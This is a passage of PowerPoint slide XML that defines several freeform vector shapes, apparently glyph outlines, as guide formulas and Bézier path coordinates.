                  <a:lnTo>
                    <a:pt x="136" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="155"/>
                    <a:pt x="127" y="164"/>
                    <a:pt x="123" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="170"/>
                    <a:pt x="116" y="159"/>
                    <a:pt x="112" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="213"/>
                    <a:pt x="108" y="214"/>
                    <a:pt x="108" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="216"/>
                    <a:pt x="96" y="256"/>
                    <a:pt x="89" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="296"/>
                    <a:pt x="57" y="297"/>
                    <a:pt x="49" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="297"/>
                    <a:pt x="52" y="293"/>
                    <a:pt x="52" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="274"/>
                    <a:pt x="43" y="265"/>
                    <a:pt x="30" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="265"/>
                    <a:pt x="8" y="274"/>
                    <a:pt x="8" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="308"/>
                    <a:pt x="25" y="328"/>
                    <a:pt x="50" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="328"/>
                    <a:pt x="122" y="262"/>
                    <a:pt x="124" y="257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201"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6" name="Freeform 847">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3A5659-CBDF-404A-9973-548FFAF666E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1920876" y="1897063"/>
              <a:ext cx="47625" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 97 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="99" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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7" name="Freeform 848">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BE25EF-28F4-4069-ABB8-96F6D94B0AD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2024063" y="1930401"/>
              <a:ext cx="22225" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 152 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 183 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="46"/>
                    <a:pt x="62" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="165"/>
                    <a:pt x="47" y="152"/>
                    <a:pt x="31" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="152"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="62" y="199"/>
                    <a:pt x="62" y="18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8" name="Freeform 849">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B64DA8E-67C9-44B7-8250-CC8FDFD4DA78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2092326" y="1874838"/>
              <a:ext cx="61913" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106 w 177"/>
                <a:gd name="T1" fmla="*/ 66 h 498"/>
                <a:gd name="T2" fmla="*/ 173 w 177"/>
                <a:gd name="T3" fmla="*/ 11 h 498"/>
                <a:gd name="T4" fmla="*/ 177 w 177"/>
                <a:gd name="T5" fmla="*/ 5 h 498"/>
                <a:gd name="T6" fmla="*/ 168 w 177"/>
                <a:gd name="T7" fmla="*/ 0 h 498"/>
                <a:gd name="T8" fmla="*/ 72 w 177"/>
                <a:gd name="T9" fmla="*/ 62 h 498"/>
                <a:gd name="T10" fmla="*/ 72 w 177"/>
                <a:gd name="T11" fmla="*/ 176 h 498"/>
                <a:gd name="T12" fmla="*/ 52 w 177"/>
                <a:gd name="T13" fmla="*/ 227 h 498"/>
                <a:gd name="T14" fmla="*/ 5 w 177"/>
                <a:gd name="T15" fmla="*/ 243 h 498"/>
                <a:gd name="T16" fmla="*/ 0 w 177"/>
                <a:gd name="T17" fmla="*/ 249 h 498"/>
                <a:gd name="T18" fmla="*/ 8 w 177"/>
                <a:gd name="T19" fmla="*/ 254 h 498"/>
                <a:gd name="T20" fmla="*/ 71 w 177"/>
                <a:gd name="T21" fmla="*/ 299 h 498"/>
                <a:gd name="T22" fmla="*/ 72 w 177"/>
                <a:gd name="T23" fmla="*/ 323 h 498"/>
                <a:gd name="T24" fmla="*/ 72 w 177"/>
                <a:gd name="T25" fmla="*/ 422 h 498"/>
                <a:gd name="T26" fmla="*/ 96 w 177"/>
                <a:gd name="T27" fmla="*/ 478 h 498"/>
                <a:gd name="T28" fmla="*/ 168 w 177"/>
                <a:gd name="T29" fmla="*/ 498 h 498"/>
                <a:gd name="T30" fmla="*/ 177 w 177"/>
                <a:gd name="T31" fmla="*/ 493 h 498"/>
                <a:gd name="T32" fmla="*/ 169 w 177"/>
                <a:gd name="T33" fmla="*/ 487 h 498"/>
                <a:gd name="T34" fmla="*/ 107 w 177"/>
                <a:gd name="T35" fmla="*/ 444 h 498"/>
                <a:gd name="T36" fmla="*/ 106 w 177"/>
                <a:gd name="T37" fmla="*/ 420 h 498"/>
                <a:gd name="T38" fmla="*/ 106 w 177"/>
                <a:gd name="T39" fmla="*/ 316 h 498"/>
                <a:gd name="T40" fmla="*/ 86 w 177"/>
                <a:gd name="T41" fmla="*/ 268 h 498"/>
                <a:gd name="T42" fmla="*/ 47 w 177"/>
                <a:gd name="T43" fmla="*/ 249 h 498"/>
                <a:gd name="T44" fmla="*/ 106 w 177"/>
                <a:gd name="T45" fmla="*/ 186 h 498"/>
                <a:gd name="T46" fmla="*/ 106 w 177"/>
                <a:gd name="T47" fmla="*/ 66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7" h="498">
                  <a:moveTo>
                    <a:pt x="106" y="66"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="46"/>
                    <a:pt x="119" y="14"/>
                    <a:pt x="173" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="10"/>
                    <a:pt x="177" y="8"/>
                    <a:pt x="177" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="168" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="0"/>
                    <a:pt x="73" y="25"/>
                    <a:pt x="72" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="195"/>
                    <a:pt x="72" y="211"/>
                    <a:pt x="52" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="242"/>
                    <a:pt x="16" y="243"/>
                    <a:pt x="5" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="244"/>
                    <a:pt x="0" y="246"/>
                    <a:pt x="0" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="254"/>
                    <a:pt x="3" y="254"/>
                    <a:pt x="8" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="256"/>
                    <a:pt x="65" y="274"/>
                    <a:pt x="71" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="304"/>
                    <a:pt x="72" y="305"/>
                    <a:pt x="72" y="323"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="422"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="443"/>
                    <a:pt x="72" y="459"/>
                    <a:pt x="96" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="493"/>
                    <a:pt x="148" y="498"/>
                    <a:pt x="168" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="498"/>
                    <a:pt x="177" y="498"/>
                    <a:pt x="177" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="488"/>
                    <a:pt x="174" y="488"/>
                    <a:pt x="169" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="485"/>
                    <a:pt x="114" y="469"/>
                    <a:pt x="107" y="444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="439"/>
                    <a:pt x="106" y="438"/>
                    <a:pt x="106" y="420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="293"/>
                    <a:pt x="102" y="284"/>
                    <a:pt x="86" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="258"/>
                    <a:pt x="61" y="253"/>
                    <a:pt x="47" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="237"/>
                    <a:pt x="106" y="214"/>
                    <a:pt x="106" y="186"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="6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9" name="Freeform 850">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CCA2726-4ACE-4609-BB91-2DB6FC44479F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2187576" y="1897063"/>
              <a:ext cx="47625" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 135 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 113 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 97 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 113 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 135 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="135" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="113" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="99" y="147"/>
                    <a:pt x="113" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="128" y="138"/>
                    <a:pt x="128" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135"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10" name="Freeform 851">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82609597-03E5-4AF7-A02A-5BDA8563F521}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2260601" y="1909763"/>
              <a:ext cx="73025" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 63 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 63 w 211"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 9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 h="280">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="63" y="11"/>
                    <a:pt x="63" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="262"/>
                    <a:pt x="97" y="280"/>
                    <a:pt x="134" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="280"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="205"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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11" name="Freeform 852">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{195DF266-6E2B-49BE-B4E3-2E5B95B5FA5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId28"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2355851" y="1928813"/>
              <a:ext cx="71438" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 223"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 223"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 223"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 223 h 223"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 223"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 223"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 19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23">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="102" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="223"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
